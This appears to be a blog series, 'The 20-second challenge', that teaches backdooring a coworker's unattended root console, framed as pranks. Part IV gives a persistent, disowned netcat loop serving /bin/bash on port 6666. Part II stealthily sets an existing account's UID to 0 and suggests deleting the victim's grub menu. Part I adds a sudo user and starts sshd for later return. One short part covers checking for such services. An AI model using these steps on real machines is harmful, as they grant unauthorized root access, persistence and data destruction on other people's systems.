The 20-second challenge - Part IV

You could sometimes be lazy enough to willing have direct root shell access (no login required). A really simple solution exists again, redirecting the socket directly to /bin/sh (or better, /bin/bash) launched by an UID 0 account.

I have 2 basic solutions for that:
- netcat
- inetd

The inetd method is more adapted to Unix system where it often comes in default configuration. Netcat, on the other side, is often found in Linux systems. With netcat, just use:

$ while 'true'; do netcat -l -p 6666 -e /bin/bash; done&

This will background your infinite loop (this is a bit dirty...). It is unforunately completely un-stealth, as the netcat process will be seen in ps and netstat returns. Furthermore, if you kill the session used to launch the loop, the current netcat job will be attached to pid 1 and the loop will stop.

An easy solution to let the "while" loop running, attached to a lower level pid (e.g. pid 1) is to "disown" it from your current session:

before disowning:
├─gnome-terminal─┬─bash───pstree
│ ├─bash
│ ├─bash───bash───netcat

after disowning:
init─┬─6*[agetty]
├─bash───netcat

To do this, a very simple bash builtin command: disown!

$ while 'true'; do netcat -l -p 6666 -e /bin/bash; done&
[1] 3295
$ jobs
[1]+  Running                 while 'true'; do
    netcat -l -p 6666 -e /bin/bash;
done &
$ disown %1

Next time, I will check some (x)inetd tricks to backdoor even more colleagues' stations.

The 20-second challenge - Part III

Here is a quick post on how to check you don't have any malicious services running on your machine.

$ netstat -antup | grep LISTEN

It will list all sockets listening for connections on your machine, and the associated process. Check if there is no suspect telnet running...
Also, check your crontab:

$ crontab -l
$ crontab -e

List and edit weird jobs. Don't forget to do that for all users that can log in.

The 20-second challenge - Part II

OK, you have the console logged just in front of you! Let's go for the simplest backdoor (much simpler than the wheel gid + visudo previously posted): the UID 0 account!

- Edit the /etc/passwd.
- Choose an account with a dummy name and a shell environment (do not create a new one: it would not be stealth enough).
- Change its UID to 0.
- Eventually reset its password if you do not know the original one.
Done.

$ cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
[...]
prout:x:0000:1016::/home/prout:/bin/bash
$ su - prout
Password:
#id
uid=0(root) gid=1001(prout) groups=0(root),1001(prout)

Now, you can reset the root password on demand, kill the graphical interface of your co-worker on demand, and delete his /boot/grub/menu.lst for even more fun!

The 20-second challenge - Part I

Say a coworker left his computer unattended, with a root console opened. He is about to come back (you can hear its footsteps in the corridor). You have approximatively 20 seconds to backdoor his computer. What do you do ?

Here is the most straightforward trick:

$ useradd -g users, wheel -s /bin/bash sysadm
$ passwd sysadm
$ visudo
$ /etc/init.d/ssh start

This way you:
- create a new user. The name has to look "normal", you should avoid "l33th4xx".
- set its password.
- add your newly created user to the sudoers file.
- start the ssh server, so you can come back later.

First prank:
$ [come back to your office]
$ ssh sysadm@my-stupid-coworker
$ sudo su
$ su my-stupid-coworker
$ export DISPLAY=:0.0 && firefox http://bonjourmadame.fr

No need for explanation ;-)

Hopefully we'll come back for more tricks / pranks / anti-coworker-pranks.

The echo complexity

Just a tip for our customers: if the following command does not actually configure your HTTP proxy settings:

echo "export http_proxy=http://my-proxy:8080"

just try :

export http_proxy=http://my-proxy:8080

It's sometime better without the "echo".